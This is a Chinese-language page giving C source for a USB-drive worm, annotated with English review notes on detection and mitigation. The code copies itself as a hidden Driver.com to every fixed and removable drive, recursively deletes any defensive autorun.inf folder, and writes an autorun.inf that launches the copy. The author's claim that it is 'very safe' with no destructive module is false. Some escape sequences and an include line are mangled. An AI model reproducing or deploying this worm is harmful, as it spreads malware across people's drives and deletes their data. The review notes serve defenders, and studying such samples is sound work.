一个简单的U盘小病毒

///
// A simple USB-drive virus, implemented in C, with no destructive module; very safe.
// This is an enhanced version that can get past the "autorun.inf folder" defence.
// Author: 冷却
// Note: when linking with VC, this program must be set to multithreaded mode.
///
// NOTE(review): the "no destructive module" claim above does not hold for one case.
// main() calls DeleteDirectory() on <drive root>autorun.inf, which recursively deletes
// every file and subdirectory under a directory of that name.
//
// NOTE(review), what the listing does: for each fixed or removable drive it copies the
// running executable to the drive root as Driver.com, marks the copy hidden+system,
// removes any directory named autorun.inf, then writes a hidden+system autorun.inf file
// that names Driver.com as the open/explore command.
//
// NOTE(review), detection: look for hidden+system Driver.com and autorun.inf files at
// volume roots, a process writing autorun.inf to several drive roots in a row, and the
// removal of an existing autorun.inf directory.
//
// NOTE(review), mitigation: a placeholder autorun.inf directory is not sufficient on its
// own, since this listing removes it first. Disable AutoRun at the OS/policy level
// (e.g. NoDriveTypeAutoRun) and scan removable media on insertion.
//
// NOTE(review): the header name after #include is missing from the page as printed, and
// the string literals below are reproduced exactly as they appear on the page.
#include
BOOL DeleteDirectory(char* DirName);

// Entry point: walks the logical-drive list and performs the copy / autorun.inf steps
// described above on every fixed or removable drive.
void main()
{
    HMODULE handle;
    HANDLE autorun;
    unsigned long autotextNum;
    int diskType;
    char virusfilePath[128]={0};
    char driveList[128]={0};
    char virusCopyFilePath[128]={0};
    char *pDriveList=driveList;
    // Text written into autorun.inf; every command entry names Driver.com.
    char autotext[]=
        "[AUTORUN]/r/n"
        "OPEN=Driver.com/r/n"
        "SHELL//OPEN=打开(&O)/r/n"
        "SHELL//OPEN//COMMAND=Driver.com/r/n"
        "SHELL//OPEN//DEFAULT=1/r/n"
        "SHELL//EXPLORE=资源管理器(&X)/r/n"
        "SHELL//EXPLORE//COMMAND=Driver.com/r/n";

    handle = GetModuleHandle(NULL); // get own instance handle
    GetModuleFileName(handle,virusfilePath,sizeof(virusfilePath)); // get own full path
    GetLogicalDriveStrings(sizeof(driveList),driveList); // get the drive list
    while(*pDriveList != NULL)
    {
        diskType = GetDriveType(pDriveList); // get the drive type
        if(diskType == DRIVE_FIXED || diskType ==DRIVE_REMOVABLE) // infect if it is a hard disk or a USB drive
        {
            // copy itself
            memset(virusCopyFilePath,0,sizeof(virusCopyFilePath));
            strcpy(virusCopyFilePath,pDriveList);
            strcat(virusCopyFilePath,"Driver.com");
            CopyFile(virusfilePath,virusCopyFilePath,false);
            SetFileAttributes(virusCopyFilePath,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); // set file attributes

            // write autorun.inf
            memset(virusCopyFilePath,0,sizeof(virusCopyFilePath));
            strcpy(virusCopyFilePath,pDriveList);
            strcat(virusCopyFilePath,"autorun.inf");
            // If an autorun.inf folder exists, delete it first (this is what gets past
            // the "autorun.inf folder" defence).
            DeleteDirectory(virusCopyFilePath);
            autorun = CreateFile(virusCopyFilePath,GENERIC_ALL,0,0,CREATE_NEW,FILE_ATTRIBUTE_HIDDEN,0);
            if(autorun != NULL)
            {
                WriteFile(autorun,&autotext,sizeof(autotext)-1,&autotextNum,0);
                SetFileAttributes(virusCopyFilePath,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
            }
        }
        pDriveList += 4; // advance to the next entry in the drive list
    }
}

// Helper: delete the given directory.
// Enumerates DirName with CFileFind, recurses into subdirectories, deletes files, then
// removes DirName itself. The results of the recursive call and of DeleteFile are not
// checked. Returns FALSE when RemoveDirectory fails, TRUE otherwise.
BOOL DeleteDirectory(char* DirName)
{
    CFileFind tempFind;
    char tempFileFind[256];
    sprintf(tempFileFind,"%s//*.*",DirName);
    BOOL IsFinded = tempFind.FindFile(tempFileFind);
    while(IsFinded)
    {
        IsFinded = tempFind.FindNextFile();
        if(!tempFind.IsDots())
        {
            char foundFileName[256];
            strcpy(foundFileName,tempFind.GetFileName().GetBuffer(256));
            if(tempFind.IsDirectory())
            {
                char tempDir[256];
                sprintf(tempDir,"%s//%s",DirName,foundFileName);
                DeleteDirectory(tempDir);
            }
            else
            {
                char tempFileName[256];
                sprintf(tempFileName,"%s//%s",DirName,foundFileName);
                DeleteFile(tempFileName);
            }
        }
    }
    tempFind.Close();
    if(!RemoveDirectory(DirName))
    {
        return FALSE;
    }
    return TRUE;
}
